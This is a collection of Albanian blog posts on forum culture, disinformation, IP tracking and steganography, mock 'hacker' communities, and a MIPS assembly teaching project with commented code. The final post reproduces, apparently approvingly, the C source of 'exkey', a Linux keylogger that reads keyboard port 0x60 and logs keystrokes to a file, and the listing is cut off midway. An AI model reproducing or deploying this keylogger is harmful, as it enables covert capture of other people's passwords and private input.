Tematika e forumeve shqiptare – Na bashkoi Injoranca

Dihet qe shumica e atyre qe perdorin internetin sot jane te rinjt, dhe si perqindje jane ata qe e perdorin me rregullisht internetin ne krahasim me te tjeret.
Informacionin fillestar e marrin nga faqet qe vizitojn perderisa tashme eshte ber ne mod qe mos te shihet me televizori, dhe nuk para besoj qe ka te rinj qe shohin edicionin informativ te lajmeve tek TVSH xD.
Keshtu qe ja ku jemi, ne te rinjte e ne dore kemi nje browser per te eksporuar ne internet. :(
Problemi kryesor i webmasterave shqiptare sot, eshte se si te kene me shume vizitor ne menyre qe te klikohen me shume ads qe ata te fitojn me shum lek.
E si te ken me shume vizitor?
– Duke i mbushur forumet e tyre me sa me shume postime, qe te terheqin interes tek vizitoret.
Po ç’fare terheq interes tek vizitoret?
– Ah, kjo varet nga niveli intelektual i vizitoreve, nese vizitoret terhiqen nga tralala zura nje gale, edhe temat do jene tralala zura nje gale nese niveli kulturor i vizitoreve do jete me i lart atehere dhe temat do te jene te nje niveli me te lart.  Po perderisa nuk mund te kontrollojm nivelin e vizitoreve, atehere do lem vet vizitoret te zgjedhin se ç’fare te diskutojn apo jo?
Ja nje list titujsh temash te fundit qe mora nga nje forum shum i vizituar:
Ka momente qe..
Une të jap …. po ti çfarë me jep????
Une them qe..
Personi sipër…
Loja filloi. Prisni baluket!
Loje me shkronjen e fundit te fjales..
Si me vjedh 88 pale brek te komshies.
E gjera te tilla… spo e zgjas me i keni shume mire parasysh se i vizitoni perdit.
Rinia qe eshte forca kryesore levizese, apo LEVA e shoqeirse qe diskuton keto tema?
Ku eshte kultura?
Ku eshte intelektualja?
Ku eshte perfitimi?
hah, kjo çon vetem ne nje drejtim, ne obfuskimin mental, i çon te rinjt ne nje stad mendor bageti e buqesi, te vetmet gjera qe mendojn jan, seksi, sporti, ku me pi kafen e mbazdites apo te mengjezit, ke me sha apo me marr ne goje e asnje nga keto nuk u sjell perfitime qofshin keto ekonomike apo psiqike apo shpirterore perkundrazi jane e kunderta.
A, me falni, dikush nga ju lexues te dashur do thote qe ne forum ka dhe tema si Biologjia, apo Lajme, apo Aktualitete shoqërore, apo ku ta di une se ç’fare tjeter, po shikoni njeher se sa aktive jan, dhe per me teper shikoni se ç’fare temash plera paraqiten.
O RINI, ZGJOHU!
MOS E MBUSH MENDJEN ME PLERA, NUK DO TE TE SHERBEJN KURRE PERKUNDRAZI JANE NE DEMIN TEND, DO TE TE KTHEJN NE NJE SKLLAV TE MIREFILLT NESER KUR DO DALESH NE JETE.
O RINI ZGJOHU!
FILLO TE PERDORESH TRURIN QE KE, SHIKO SE ç’FARE FITON E ç’FARE HUMBET.
O RINI, DIKUSH PO TALLET ME TY, E TI RRI EDHE I BUZEQESH.
INJORANCA NA BASHKOI NEPER FORUME, LE TI MBAJM ISO NJERI-TJETRIT TANI.
LE TE ECI PERPARA SHQIPERI ME INJORANC , LE TE ECIM PERPARA, PERAPARANII, KAPINIII,….VRITINI……

Teknologjia e Dizinformimit | IT apo DT? 0-day exploit

Teknologjia e Informacionit.

Dihet qe sot fuqia reale eshte informacioni, ashtu siç ka qene dhe shum kohe me perpra , ne baze te informacioneve qe disponon dikush mund te kete perparesi ndaj dikujt tjeter vetem ne baze te ketyre informacioneve.
Pikerisht keto informata bene qe te perparonte shkenca e gjithashtu ne baze te perparimit te njohurive sot po jetojm ne epoken informatike.
Sot informacioni qarkullon shume me shpejt se atehere ne baze te internetit, telekomunikacionit, e mjeteve te shumta qe disponojm sot.
Mire, po ju kursej veshtrimet historike  mbi IT-n dhe evolimin e saj dhe po kalojm menjehere aty ku na intereson.
Thame me siper qe ai individ qe posedon informacion eshte me i fuqishem se sa nje individ qe nuk e posedon ate informacion, marrim rastin ne jeten tone te perditshme psh, 2 persona qe kerkojn pune, njeri duke u rropatur e duke kontaktuar 1 nga 1 shoqerite e duke dorezuar kurrikulume kurse tjetri duke shkuar ne nje shoqeri punesimi dhe duke lene kurrikulumin dhe profilin qe kerkon per tu punesuar.
Ne kete rast i dyti eshte me ne avantazh sepse kurrikulumi i tij do te qarkulloj ne me shume duar dhe shansi per te zen nje vend pune eshte me i madh.
Meqenese ‘elita’ (ata qe udheheqin) e di qe Information == Power atehere u lindi nje problem shume i rendesishem i koheve moderne.
Nese popullsia (masa) informohet realisht per realitetin e sendeve, produkteve, menyres se jeteses, mirqenies sociale, ekonomike dhe shpirterore atehere me siguri ata nuk do te pranonin :

  1. Shtet qe u shet helm (duhanin) duke u shkruajtur siper qe “duhani vret” sepse eshte shkencerisht e provuar qe njeriu eshte me i priur ndaj diçkaje qe i eshte ndaluar, pra interesi ndaj asaj eshte me i madh.
  2. Shtet qe u thote qe nese do te rrethojn vetem me materiale, sa me shume pare do te jene me te lumtur e me kete i kthen ne skllever te vertet te mesjetes pasi njeriu e vendos si qellim kryesor te jetes se tij shtimin e pasurive materiale hera-heres duke flijuar dhe gjerat me te dashura biles edhe veten e vet dhe harron qe sa me shume te kete, aq me shume do te deshiroj dhe se i shitet sapuni (mireqenia ekonomike) per djath (mireqenie shpirterore).
  3. Faktin qe dikush eshte duke i mashtruar vazhdimisht, duke u ven “parrulla”, “rreklama”, “lajme sensacionale”, me nje fjal INFORMACIONE me ane te se cilave kjo mas shnderrohet ne nje tuf bagetish e cila shkon nga e çon bariu pa menduar 2 here.

Atehere kur perhapjen e informacionit nuk mund ta bllokojn siç u perpoq kisha ne vitet 1500-1600 me vrasjet e shkencetareve ç’fare u mbetet te bejn ?

Teknologjia e Dizinformacionit.

Kjo realisht eshte teknologjia me e zhvilluar e koheve te sotme, dhe ne baze te rregullit ‘Informacioni eshte FUQI’ duke mos pasur mundesi per te bllokuar rrjedhjen e informatave atehere zgjidhja ishte shume efikase. DIZINFORMIMI.

Parimi i Dizinformimit.
Parimi i dizinformimit eshte shume i thjesht , ne thelb ai duhet te krijoj stade mendore dhe psiqike tek njerezit hera-heres edhe duke kontrolluar ndjenjat e tyre duke shkaktuar dashuri per diçka (edhe pse ajo ne realitet mund te jete e demshme) dhe urrejtje per diçka (edhe pse ne realitet ajo mund te jete e dobishme).
Pra thelbi i dizinformimit eshte qe te krijoj tek mendjet e njerezve perkufizime per dukuri te ndryshme shoqerore dhe automatikisht e çon masen te mbaj nje krah apo nje tjeter.
Ne ndryshim nga teknikat e vjetra per te suportuar doktrina te ndryshem, dizinformimi eshte shume me efikas dhe i fuqishem pasi e  manipulon audiencen ne nivelin racional duke bere me kete qe edhe gjera qe jane shume racionale dhe te logjikshme te kthehen ne tabu dhe e njejta audience u kthehet kunder duke i sulmuar me gjithe fuqine e tyre edhe pse ato mund te jene ne favor te tyre.

Shembuj te fatkeqsive qe ka sjelle dizinformimi.

  • Vdekjen e mijera personave duke e justifikuar me fraza se ata jane terrorista, kane bomb atomike, kerkojn shkaterrimin e botes, jane barbar, e te tjera si keto duke fshehur ne te njejten kohe vrasjen e grave dhe femijeve, perdhunimet dhe perversitetet e shumta.
  • Mendimin e perbashket tek njerezit se amerika ka fituar luften ne vjetnam dhe amerika = ha mer dhe ik.
  • Fatkeqsit tek njerezit me ngjyre ne kohen e Martin Luter Kingut ku ‘elita’ qe kerkonte skllever u mbushte mendjen mases se njerezit me ngjyre jane kafshe, nuk kane te drejten e fjales dhe jane vetem per te sherbyer dhe per tu shfrytezuar.
  • UFO-t e famshem qe duan te zbresin vetem ne amerik, dhe rusi dhe kjo vetem ne kohe kur kishte ndonje skandal ekonomik apo politik :S, mos me thoni qe ishte per te zhvendosur vemendjen e mases nga skandali 😛
  • Dizinformimet ne shqiperine komuniste qe ata jashte jane ne krize dhe nuk kane ç’fare te han e te tjera si keto, per me shume info shih: http://www.disinfo.com/content/

Shembujt Modern te Dizinformimit.

  • Me i madhi eshte siç e cekem me siper, pra sa me shume pare te kesh aq me shume do jesh i lumtur dhe po e zem sikur behesh aq i pasur, dihet qe do kerkosh me shume, do jesh i preokupuar ne shtimin e tyre dhe do shqetesohesh nga pakesimi i kesaj pasurie per te mos then pastaj qe 73% e resorseve te tokes konsumohen nga vetem 15% e popullates se saj, dhe kjo gjendet shumica ne amerik, angli, europ.E çuditshme se si egziston sot uria ne bot apo jo?
    Ku duan te dalin me kete?, Nese popullsia eshte e gjitha e bashkuar dhe  shkon ne nje drejtim atehere eshte me thjesht e kontrollueshme e ne kete menyre njerezit nuk jane me te lumtur por behen me mizerabel pasi kjo lloj perkatesie i ben qe  te zhvishen nga vlerat njerezore. Si? se beson? Sa raste kemi degjuar qe njerezit genjejn per te fituar qofte dhe nje opionion te mire , le me per lek, sa raste dim qe te kene ndodhur krime per  hir te atyre lekeve, sa raste dime qe kane ndodhur raste te turpshme e rasti i fundit ishte dhe ai i  ish ministrit te KULTURES i cili ne saje te postit mire qe hante si derr, po donte dhe te **** si derr.
  • Thenia se njeriu vjen nga majmuni, vazhdon akoma tek disa individ dhe kjo thenie qe synon zhveshien e njeriut nga ndjenjat, apo perjetimet shpirterore dhe kthyerjen e tij ne nje kafsh dhe edhe kjo “çuditerisht” u perkrah shume nga Karl Marksi, lol mos mbase ngaqe ishte komunizem dhe ne komunizem robi edhe kur çohej ne mengjes duhet te thoshte rroft enveri? [tashme po themi eshte bere me shume nje propagand se sa dizinformim]
  • Rreklamat, qe vijn me parrulla si “shijoje jeten”, “pasioni i jetes”,”ndjeje kenaqesine”, e te gjitha keto duke pire nje shishe wiski?
    LOL, po une mund te jem dhe injorant po kur e pi nuk di se ç’fare thua, vjell, djersitesh, vjen ere e keqe, le nam ne mes te shoqeris, dukesh si penevreket e gjyshes te hedhur per tu lar.
    A kjo eshte pasioni i jetes?, “Kenaqesia?”
  • Dizinformimi politik, kjo hyn me shume tek propaganda po shume fenomene qe ndodhin ne jeten e perditshme, ashtu si dhe shume perkufizime qe u jepen gjerave jane si pasoj e rrymave politike qe te gjitha bashk pa asnje lloj perjashtimi mendojn vetem per veten dhe jane te gjitha bashk pa asnje lloj perjashtimi ne dem te mases.
  • Nje rast tjeter i dizinformimit qe me vjen ne kete moment eshte modelet qe u vihen perpara adoleshenteve te cilat perpiqen te jene si ato duke kujtuar se nese jane si ato do te jene “COOL” pa e pare se ç’fare i ndodh ne spital nje anoreksikeje.

Mund te vazhdoj me shume pika te tjera, por per mos tu lodhur as gishtat e mi e as syte tuaj po e permbledh qe shumica e informacioneve qe degjojm , shohim, na tregojne, apo qe na vijn jane fals dhe synojn ne INJORANTIZIMIN tone dhe kthimin e njeriut ne BEEEEEEEEEEEEEEE, MUUUUUUUUUUUU, apo MAJMUN (e ka thene dhe darvini apo jo).
I vura emrin DT (disinformation technology) pasi tashme eshte kthyer ne nje Teknologji qe ska te share, ne perfundim e gjith kjo fryme dizinformimi pershkruhet nga:
“Kur bagetis nuk i qellon dot me shkop per ta futur ne vath, atehere do e ndjellesh me diçka e keshtu do e mjelesh pa prolbem ;)”

Ja 2 video qe tregojn pak a shum realitetin e dizinformimit, dhe kjo eshte vetem nje nga anet e Dizinformimit

Arti I Tracking dhe Kunderpergjigja (crypto apo Steganography)

Flitet shume per privacy apo JO?

Yep, edhe une degjoj shume te flitet per te, ne kete teme nuk do te flasim as gjeresisht dhe as shkurtimisht per thjeshtesine me te cilen dikush mund te marri vesh dhe te kete shume informacione per ty personalisht.
Mos ma vini re nese nuk do i them shume gjera ne rend, por do permend teknikat qe perdoren per keto lloj veprimesh nga persona privat apo persona shteteror (SHTETI :D).
Meqenese je duke lexuar kete teme, kompiuteri yt ne baze te ligjeve te internetit ka nje adrese IP e cila ne ate moment eshte unike per kompiuterin tend dhe nje targ identifikuese gjithashtu per kompiuterin tend ne ate moment.
IP-t jane :

  • Statike (rast ku ip-ja jote eshte e pandryshueshme dhe ne keto raste dhe DNS-t gatway etj) jane fikse dhe duhen impostuar manualisht
  • Dinamike ketu keni me shume fat pasi ip-ja ndryshon ç’do here qe lidheni ne internet
  • PS (nuk po merrem me trajtimin e ip-ve ne veçanti me klase A etj etj sepse nuk eshte tema keshtu qe pranoini keto dy kategori ne aspektin e privacy dhe tracking)

IP-ja ===>Routeri\ADSL\WIRELESS\ETJ\===> Networket e IPS-s , Broadband ,ISDN, PSDN, kemi Backbone dhe te gjitha paketat TCP\IP, UDP, ICMP, apo paketa ne form peshtyme 😀 qe dalin nga kompiuteri yt, qe te shkojn tek xhaxhi interneti duhet te kalojn njeher ne routerin e shtepise tende, pastaj neper routerat e ISP-s (atij qe te jep internetin) neper firewallet e tyre hardware, routerat c0re, serverat e ndryshem (na baze te sherbimit apo lloit te lidhjes) dhe pastaj perfundojn tek interneti.
Keshtu qe dikush thot,
Po un perdor proxy !!
Qe te shkojn paketat e tua tek proxy duhet te kalojn serisht permes ISP-s, dhe qofte kjo web-proxy, cgi-proxy apo ç’faredo-proxy ti nuk mund te shpikesh nje IP, tenden dhe te kalosh paketat neper routera imagjinare te ISP-s qe ndodhet ne trurin tend keshtu qe :
HARROJE ANONIMITETIN!

Qe ti biem shkurt, me sherbime online si robotex.com apo domaintools.com mund te gjenden te gjitha te dhenat e mundshme rreth adreses IP duke bere traceroute per te pare se distancen midis hosteve te ndryshem, mund te merret informacion mbi dns-t  (dns lookup), mund ti behet reverse ip per te pare ip-t e tjera qe jane ne te njejtin vend e  me disa sherbime te tjera edhe hostet\kompiuterat\routerat\ etj qe jane afer me ip-n tone te dashur, dhe kjo vetem nga nje email.
Per kete arsye, nuk keshillohet te perdoren emaile si hotmail, yahoo, email apo ku ta di un qe nuk japin ip private ne momentin qe dergohet emaili keshtu qe mos te flasim pastaj per vizita neper webfaqe apo ç’do komunikim te lloit tcp, udp, icmp, igmp e keshtu me rradh.
Pra mjafton qe ju te keni nje ip, dhe rreth asaj mund te arrihen te gjitha informacionet e mundshme mos te flasim pastaj nese i interesuari per informacion perdor aplikacione apostafat per te marre me shume te dhena rreth sistemit tuaj, programeve te instaluara (ne rast per identifikim vulnerabiliteti), dhe keto pa u vene shume re nga nje perdorues i shkujdesur si puna juaj :).
Kalojm tek diçka tjeter me e rendesishme.
Nese dikush u ka piketuar hehe :D, atehere ai do bej çmos per te marre vesh se kush jeni ju, identitetin tuaj dhe gjerat me te zakonshme jane te kerkoj me emailin tuaj ne google, nicknamet qe perdorni, te hamendesoje facebook-un tuaj, apo ti kerkoj ndonje shoku qe ka ne dore facebook-un informacione shtese mbi ju.
Nese kerkon akoma me shume, do te kerkoj te afrohet me shume, do te vizitoj forumet qe vizitoni ju, do te perpiqet qe te kete ne msn,\skype, etj dhe aty do filloj me Social Engineering dhe perfundimi do jete qe do dij me shume ai per ju se sa gjendja civile. E meqe ra fjala nese eshte tip akoma me shume i eger ne kete zanat do te kerkoj informata per ju ne sisteme shteterore si psh, SHIKU, POLICIA , GJENDJA CIVILE, Do te hyj ne sistemet ku ju keni kryer shkollimin tuaj, apo ne sistemin e ndermarrjes tuaj.
Dhe e gjithe kjo per nje person ç’faredo [jo dhe aq ç’fare do e :p] i cili eshte perpara nje kompiuteri.
Po ne rastin e dikujt qe ka ne dore lejen per te hyre ne ISP-t e ndryshme?
LoL, ç’do bit qe do dali prej kompiuterit do te analizohet dhe do te shikohet me vemendje ç’do levizje pa dallim moshe,feje krahine ideje dhe per te kjo eshte shume me e thjesht sepse ka akses ne providerin tuaj dhe mjafton qe te vendosi nje snifer ne interfacet me te perdorura duke monitoruar gjithçka qe ndodh, edhe takimin e kompiuterit tuaj me proxy-n qe eshte ne nje ISP tjeter.
Pra ne kete rast jeni akoma me i vdekur pasi nuk ka dhe nuk egziston ndonje mundesi qe ju te kryeni qoft gjen me te vogel dhe te jeni anonim.
Kalojm tani tek disa qe perpiqen te bejn “te zgjuarin” dhe perseri kapen me presh ne dore :S
Keni degjuar per Anonymization Application Programming Interface (AAPI) ?, po per Crypto-PAn? po per IP::Anonymous? , besoj qe vetem nga :: e moret vesh qe eshte modul i perl heheh, jeni shume te mire e di :D.
Per me shume info rreth ketyre aplikacioneve \ metodave drejtojuni:
http://www.caida.org/tools/taxonomy/anonymization.xml
Mire per te mos e komplikuar shume te themi qe disa preferojn qe te bisedojn apo te lundrojn ne mes te tuneleve  te encryptuara dhe shpesh here funksionojn kur kemi te bejm me hundlesha po kur kemi te bejm me persona qe merren me ate pune, heh, si thoni ju kush terheq me shume vemendje ne nje lum ku kalojn njerez me varka dhe aty eshte nje roje, dikush qe e ka fytyren te zbuluar apo dikush qe eshte i mbuluar me çader?
Yep, dikush qe e ka fytyren te mbuluar me çader dhe ky tipi i monitorimit do te bej çmos qe te gjej çelesat apo passwordet e lidhjes apo do te mundohet te decryptoj keto paketa dhe kete nuk mund tja ndaloj askush pasi AI tipi eshte SHTETI keshtu qe heret a vone do decryptoj lidhjen dhe,,.. te piu e zeza :D!
Shpesh here keto gjera i bejn edhe duke penetruar drejtpersedrejti ne makinen tende, pasi kane akses ne ISP, dhe qoft ne nje aplikacion ne nje tjeter do  e gjejn nje vulnerabilitet qoft edhe nje bof exploit apo diçka tjeter dhe END OF STORY.
Folem shume per tracking, ose me sakt per filozofine e saj pasi per ç’do metod te mesiperme duhet nga nje paper i mire per te shpjeguar me imtesi, e le te flasi pak tani per Steganography-n.
Marrim rastin e nje adrese email,
Nese emaili juaj ka fjale si: hack, Bum, Vjedhje, Krim, Vrasje, Perdhunim, pare, Lek, mall, etj etj atehere ai normalisht kalohet per tu analizuar, edhe nese emaili eshte i encryptuar te jesh i sigurt qe dikush merret dhe me decryptimin e tij e pikerisht ne kete pik vjen steganography dhe eshte nje koncept ‘security through obscurity’ dhe ka te bej me menyr komunikimi me fjale,imazhe, artikuj, e keshtu me rradhe pra ç’faredo lloj gjeje qe nuk bie absolutisht ne sy. PSH:
From shpirti@hotmail.com
To : zemra@hotmail.com
Title: Shif pak fotot tona ke liqeni 😛
Dhe fotot jane te renditura ne nje lloj menyre qe atij qe i sheh ne baze te nje rregulli i thon diçka, pra eshte nje lloj komunikimi ne kod i njejt me konunikimin me gjestikulacione qe bejn dy persona pra duke folur me sy, pa i thene njeri-tjetrit diçka ne forme verbale.
Diçka akoma me e sofistikuar e kesaj eshte pershembull ti dergosh atij me te cilin do te komunikosh nje email sikur po i dergon nje arkiv .zip me muzik mp3 apo me nje foto te djalit apo ku ta di une diçka normale qe nuk bie ne sy dhe nese arkivi hapet me notepad, apo me nano apo me vim ne te ka nje mesazh per personin qe e lexon.
Zakonisht ata qe merren me steganography ndryshojn vazhdimisht metod komunikimi dhe psh nje fjali e tipit “Sot ja kalova mire me bonen ne qytetin tim te dashur” mund te kete kuptimin, kalo mallin ke dogana e kapshtices apo diçka e tille.
Pra kompiuteri do te shoh nje email shume normal dhe do te kaloj filtrat si i parrezikshem, ose i parendesishem dhe nuk do te beheni pre e ketyre  sulmeve.
Tema mbi Steganographyn eshte shume me e gjere dhe eshte rast me vete, dhe eshte nga shancet e vetme ku mund te sigurohet pak anonimitet dhe pak privacy.

Hacker MANIA!!

Ej , po ça behet keshtu mor daj!!

Gjithanej hackera po shohim ?
S’po e marr vesh kete pune xD,

Mblidhen nja 3 -4 kalamaj, instalojn nje vBulletin (qe e kane mesuar ta instalojn me videotutoriale) edhe oburra forumi i radhes qulli_na_bashkoi-crew ?!?
Edhe po te shohesh permbajtjen e tyre ke vetem warez, po ç’lidhje ka warez me sigurine ne informatike?
E kam titulluar hacker mania, sepse ne nje universitet shqiptar (lajm qe me ka ardhur nga burime te sigurta) njeri nga studentet kur eshte pyetur se pse zgjodhi informatiken pergjigja ishte:
DUA TE BEHEM HACKER
:L

Imagjinoni shokimin e pedagogut mbas asaj pergjigjeje?
Nje CS student te thote, u futa ne UNI per tu bere hacker?
Nga vjen i gjith ky dizinformim?
Dhe me e rendesishmja , pse duan te gjith kalamajt te behen hacker.

Po jetojm ne nje kohe ku kompiuteri dhe interneti jane bere diçka e pandashme e jetes se perditshme.
Dhe normalisht forume te ndryshme shqiptare apo jo, tentojn te terheqin sa me shume idiota neper veprimtarit e tyre boshe dhe pa kuptim te tipit:
“Vjen nje moment dhe…”
“Sot puth ….”
“Nje puthje per arixhiun..”
“Hajdari kerkon moter..”
E te tjera si keto:
Pse i them idiot?
Si mund te quhet nje person qe kalon 4 ore perpara kompiuterit duke marre pjes ne gjera te tilla?
IDIOT
Tamam, edhe une ashtu mendoj xD.
Keshtu qe ne vazhden e fushatave elektorale te quajtura ndryshe fushata spami, ata ofrojn sherbime te PAPERSERITSHME XD si:
muzik xD, chit-chat, sms-mms-space shattle falas, “gjej dashurine e jetes”, shkarko pa limit (nga rapidhsare :L), behu hacker dhe ….
Pikerisht ne ato “…………” duam te gjejm.
Pasi eshte e ditur , apo eshte kthyer ne nje gjendje psiqike qe nese je hacker, je trendy, apo diçka e madhe, apo ku ta di un, rezultati qe mendojn femijet eshte qe jane ne qender te vemendjes dhe nuk e mendojn qe kjo “qendra e vemendjes” eshte ne kundershtim me te qenurit hacker xD
Realiteti i ketyre komuniteteve?
Deshtime te plota,
Edhe vet ata qe i drejtojn jo qe nuk jane PEN-TESTERS (hackers siç i quan masa) porse nuk ja kane idene minimale informatikes, Programimit e lere pastaj Penetration-Testing\Auditing.
Ja ku dolem qe krijohet nje rutine ne aktivitetet boshe qe ndermerren, dhe konsiderohet si pune papunesia, apo marrja me gjera te kota qe nuk te sjellin dobi.
Si mund te konsiderohet pune papunesia?
Ç’fare pune te ben babi?
-Hiç pa pune
Po ti?
-Ja ndihmoj babin nga pak

– :'(

U bej thirrje te gjith atyre qe e kane rastin ta lexojn kete teme, qe te angazhohen ne perhapjen e informacionit qe edhe nese eshte dikush qe vertet i intereson informatika mos ta humbi kohen e vet me keto idiotlluqe por ti drejtohet studimit real te informatikes dhe kjo nuk behet as duke u abonuar me RSS tek AlbanianWizard.Org e as duke u abonuar neper webe (qe i harrova) te tipit “Microsoft ka pushuar 2000 veta nga puna” wtf?
apo “Redhat sot ngriti flamurin ne vlor” :L
Pra gjera te tilla qe jane thjesht lajme dhe synojn me shume ne publicitet se sa ne dituri.
Drejtojuni librave, dhe materialeve serioze qe flasin per kete pune dhe jo kafsheve qe duan te ven lek me 2 google ads.

Perfundoi Niveli 1 tek projekti Mips Assembly

Sot perfundoi dhe niveli i pare tek projekti online open-source Mips Assembly.
Ne te jane pasqyruar nje pjese e mire instruksionesh assembly MIPS dhe gjate leximit te kodit do te hasni:

  • Komentim te ‘egzagjeruar’ do te thoja, por kjo vetem per te sqaruar mire kodin
  • 2 Stile kodimi, i pari me pseudinstruksione dhe me regjistrat te emertuar “user friendly” $s0, $t0 etj dhe ate te Hard Core Assembly Programmer me instruksione Assembly puro duke ju drejtuar dhe regjistrave me $8, $9, $12 e keshtu me rradhe.
  • Origjinalitetin shqiptar, pasi kodet nuk jane kopiuar ne ndonje vend pasi edhe nese kerkoni ne ç’faredo lloj GJUHE te botes qofte anglisht, frengjisht, italisht, kinezçe, arabisht nuk do gjeni shembuj te tille pasi kam kerkuar personalisht per diçka te tille dhe nuk e kam gjetur xD.

PS.
Universitet ne shqiperi (ashtu si ketu ku jam une) nuk eshte se zgjerohen shume per ta ber nxenesin nje programator assembly porse dihet qe te dish te programosh ne gjuhe assembly kupton ne teresi sistemin , programon duke synuar performancat me te larta, dhe kjo çon ne perpunimin e algoritmeve thuajse perfekt dhe ndonjehere programatori assembly garon me vet kompilatorin.
Nuk me mbetet vetem te them i gezofshi, jane falas dhe open-source, mund te modifikohen porse kujtohuni qe ti ridrejtoni dhe studentet e tjere ketu. (kjo per te miren e tyre se mua pak me intereson xD , eci me parullen “don’t shave it xD :D:D” ).

http://albanianwizard.org/mips_assembly_source_code_examples/fillestar/

Assemblimi i nje instruksioni assembly ne assembler (:?

Nuk eshte loje fjalesh,  mjafton te lexoni kodin dhe eshte i komentuar shume mire.
http://albanianwizard.org/Postokodin/37
Per te shkarkuar:
http://albanianwizard.org/mips_assembly_source_code_examples/programator/assembly.s

##################################

#albanianwizard.org #

#Licence GPLv3 #

#arditi – arditi{at}hush{pik}ai #

######################################################################################################################

#Asemblo instruksionin ori $8, $9, 0x0019 duke mbledhur 1 nga 1 pjeset e tij [opcode],[rt],[rs],[imm] #

#dhe duke e depozituar instruksionin ne menyre te rregullt duke respektuar formatin ne nje regjister ç’faredo. #

#########################################################################################################################################################

#Te assemblojm ORI-n #

#Formatin mund ta gjeni tek: #

#http://albanianwizard.org/informatika_shqiptare/arkitekture_kompiuterike/gjuha_e_programimit_assembly/formati-i-instruksioneve-ne-arkitekturen-mips/ #

#Ne kete ushtrim do te shohim se si duke mbledhur copeza kodi mund te arrijm tek instruksioni i deshiruar. #

#Ne rastin tone eshte: ori $8,$9,0×0019 #

#########################################################################################################################################################

.text

.globl main

######################################################################################

# INTRO #

#ori $8, $9, 0x0019 eshte i barabart me isntruksionin 0x35280019 #

#ori ka opcode 1101 == 13 ne dec ose D ne hex #

#Shohim qe ka 1 operand dhe 1 regjister destinacioni dhe 1 vlere te menjehershme #

#Operandi [rs]= $9 / 0x9 #

#Destinacioni [rt]= $8 / 0x8 #

#Vlera e menjehershme [Imm] = 0x0019 #

#Zgjedhim $24 si regjister per te asembluar instruksionin #

######################################################################################

main:

ori $11,$0,0xD # opcode /kodi i instruksionit ori (0xD)/13/1101 ===>$11

ori $12,$0,0×9 # operandi $9 / [rs] ===>$12

ori $13,$0,0×8 # destinacioni $8 /[rt] ===>$13

ori $14,$0,0×0019 # [Imm] = 0x0019 ===>$14

########################

# Rregullojm Bitet #

########################

sll $11,$11,26 # spostojm [opcode] ne pozicionin e vet pasi tani eshte 0000 0000 0000 0000 0000 0000 0000 1101

# dhe duhet te jete (si opcode) ne pozicionin e vet: 0011 0100 0000 0000 0000 0000 0000 0000

sll $12,$12,21 # spostojm [rs] ne pozicionin e vet duke e levizur majtas 21 njesi dhe kemi:

# 0000 0000 0000 0000 0000 0000 0000 1001 mbasi e spostojm 21 njesi majtas kemi

# 0000 0001 0010 0000 0000 0000 0000 0000 [kjo eshte pamja e regjistrit mbas egzekutimit te sll $12, $12, 21

sll $13,$13,16 # spostojm [rt] (destinacionin) ne vendin e vet pasi tani eshte :

# 0000 0000 0000 0000 0000 0000 0000 1000 dhe duhet te jete :

# 0000 0000 0000 1000 0000 0000 0000 0000 [kete e ben instruksioni 😉 ]

##################################################

#Fillojm spostojm bitet ne regjistrin e deshiruar#

##################################################

or $24,$24,$11 # Bejme OR [opcode] (R11) tek regjistri $24 i cili do te marri pamjen:

# 0011 0100 0000 0000 0000 0000 0000 0000

or $24,$24,$12 # Bejme OR [RS] qe e kemi “qendisur” tek regjistri 12 me $24 i cili tani duke u shtuar dhe [rs] do marri pamjen

# 0011 0101 0010 0000 0000 0000 0000 0000

or $24,$24,$13 # Kalojm me OR $13 [rt] (destinacionin) tek regjistri yne $24 qe tani do te mari pamje akoma me te kompletuar :

# 0011 0101 0010 1000 (0000 0000 0000 0000) == IMM 😀

######################################################

#Na ngelen vetem 16 bitet e vleres se menjehershme :D#

######################################################

or $24,$24,$14 # Se fundmi fusim dhe vleren tone 0x0019 qe ne sistemin binar paraqitet me : 0000 0000 0001 1001

# Dhe pamja perfundimtare e regjistrit do jete:

# 0011 0101 0010 1000 0000 0000 0001 1001

ori $2, $0, 10 # Po vdis re Vdis 😛

syscall # Mbyllja e programit

################################################################

# PERFUNDIM #

#######################################################################################

#ori $8,$9,0×0019 <===> 0x35280019 <===> 0011 0101 0010 1000 0000 0000 0001 1001 #

#######################################################################################


					

Lancohet projekti Mips Assembly

Sapo eshte lansuar projekti MIPS Assembly me source kode te gjuhes assembly per arkitekturen MIPS R3000.
Eshte i ndare ne 3 nivele, fillestar, normal, c0d3r ne baze te veshtiresise.
Meqenese eshte unik ne web dhe nuk egziston ndonje projekt i tille direktoria eshte emeruar ne gjuhen angleze ne menyre qe te perdoret dhe nga jo-shqiptaret.
Eshte ne perpunim dhe kodet do te shtohen pak nga pak.
Vizitojeni 😉
http://albanianwizard.org/mips_assembly_source_code_examples/ushtrime_assembly_mips.php

Porojekti java shtyhet.

Nje kod i lezetcem keyloggeri ne C

/* *
* exkey - excluded keylogger *
* *
* This program is free software; you can redistribute it and/or *
* modify it under the terms of the GNU General Public License *
* as published by the Free Software Foundation. *
* *
* For educational purposes only. *
* *
* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - *
* Written by: FuSi *
* VERSION 0.0a <fusi@excluded.org> *
* <www.excluded.org> *
* / close your eyes & dream with me / *
* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - *
* *
* */
#include<sys/types.h>
#include<fcntl.h>
#include<stdio.h>
#include<time.h>
#define kp 0x60
int main(int argc,char **argv){
int fd;
int prm=0,dm=0;
struct timespec *ts;
if(argc < 2){
fprintf(stderr,"exkey - excluded keylogger\nwritten by FuSi (fusi@excluded.org)\nversion 0.0a\n\nJust type: ./exkey <logfile>\n");
exit(1);}
if((fd = open(argv[1],O_CREAT|O_WRONLY|O_TRUNC)) == -1){
perror("open()");
exit(1);}
asm("int $0x80;": :"a"(101),"b"(kp),"c"(1),"d"(1));
ts->tv_nsec = 20;
ts->tv_sec = 0;
while(1){
dm = prm;
asm("inb %%dx,%%al;":"=a"(prm):"a"(0),"d"(kp));
switch(prm){
case(2) : prm ='1' ;break;case(3) : prm ='2';break;
case(4) : prm ='3' ;break;case(5) : prm ='4';break;
case(6) : prm ='5' ;break;case(7) : prm ='6';break;
case(8) : prm ='7' ;break;case(9) : prm ='8';break;
case(10) : prm ='9' ;break;case(11) : prm ='0';break;
case(12) : prm ='ß' ;break;case(13) : prm ='´';break;
case(14) : prm ='\b';break;case(16) : prm ='q';break;
case(17) : prm ='w' ;break;case(18) : prm ='e';break;
case(19) : prm ='r' ;break;case(20) : prm ='t';break;
case(21) : prm ='z' ;break;case(22) : prm ='u';break;
case(23) : prm ='i' ;break;case(24) : prm ='o';break;
